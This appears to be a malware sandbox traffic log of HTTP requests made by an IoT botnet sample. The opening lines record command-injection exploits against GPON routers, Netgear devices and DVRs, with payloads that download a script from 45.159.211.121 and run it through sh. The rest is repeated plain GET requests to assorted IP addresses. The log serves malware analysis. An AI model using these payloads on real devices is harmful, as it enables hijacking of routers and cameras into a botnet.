Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.158Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.160Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.158Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.160Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.173Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.173Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.189Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.192Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.189Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.192Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 195.24.68.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.43Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.217Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 80.251.135.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.62.194.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.62.194.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.62.194.14Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.252.116.17Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 136.243.14.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 136.243.14.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.50.56Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
